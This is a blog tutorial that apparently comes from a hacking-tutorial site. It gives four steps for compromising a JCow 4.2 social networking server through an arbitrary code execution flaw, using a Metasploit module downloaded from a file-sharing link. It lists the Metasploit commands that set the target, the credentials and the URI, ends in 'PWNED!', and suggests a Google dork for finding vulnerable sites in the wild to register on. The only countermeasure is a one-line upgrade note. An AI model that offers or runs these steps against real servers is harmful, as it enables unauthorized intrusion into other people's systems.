4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution

Bookmark

Type : Tutorial

Level : Medium

Victim Server : Windows XP SP3

Victim vulnerable application : JCow 4.2

Attacker O.S : Backtrack 5 R1

After very long times I didn't write about hacking webserver, today "again" when surfing around I've found that Jcow Social netwoking engine can be exploited and the exploit ranking marked as "excellent".

So actually what happen when you have this Jcow vulnerable version??The simple thing is the attacker can go through your web server directory and doing everything there. For example if you hosting your Jcow vulnerable version(on unsecure hosting also ๐Ÿ™‚ ) you can own your web server directory.

In this example, let's say I have a Jcow vulnerable web server in IP address 192.168.8.94. Actually it's better to try installing your own web server, but if you want to find out Jcow in the wild you can search through Google dork "intext:Powered by Jcow 4.2.0" and register as normal user there. In this tutorial I have already register as username : victim and password also victim ๐Ÿ™‚

Okay I hope you understand what I say above ๐Ÿ˜› to make it more realistic, let's try the tutorial

Requirement :

1. Metasploit framework

2. Jcow.rb exploit

mediafire.com

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution :

1. Copy the downloaded jcow.rb exploit from the download link above and copy it into /pentest/exploits/framework/modules/exploits/remote/ folder(see the command below).

cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/

the text "framework" with blue color it's because I'm using Backtrack 5 R1 and using metasploit v4.0.1, so the name was depends on your Metasploit version, maybe on your computer it can be "framework3" or "framework2" so on..

If you didn't know how to copy that jcow.rb file into your Backtrack, please refer to this tutorial about Linux folder sharing(click here).

2. Open your Metasploit console and then use the exploit you just added before.

msf > use exploit/remote/jcow

3. The next step we need to view the available switch for this exploit by running show options command, and then configured it(see the box with red color).

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution

msf  exploit(jcow) > set rhost 192.168.8.94 --> set the target IP
rhost => 192.168.8.94
msf  exploit(jcow) > set username victim --> set the username
username => victim
msf  exploit(jcow) > set password victim --> set the password
password => victim
msf  exploit(jcow) > set uri jcow --> only if jcow not in / directory fill it here
uri => jcow

Information :

Set uri can be used if jcow was not installed on webserver main directory, for example http://web-server.com/jcow.

4. After everything was set up successfully, the next thing to do was exploiting or running the exploit by using exploit command.

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution

PWNED! ๐Ÿ™‚

Countermeasures :

1. Update your Jcow Social Networking into > v4.2

Hope you enjoyed…any question?just drop it below.. ๐Ÿ™‚

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

(Visited 157 times, 1 visits today)

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com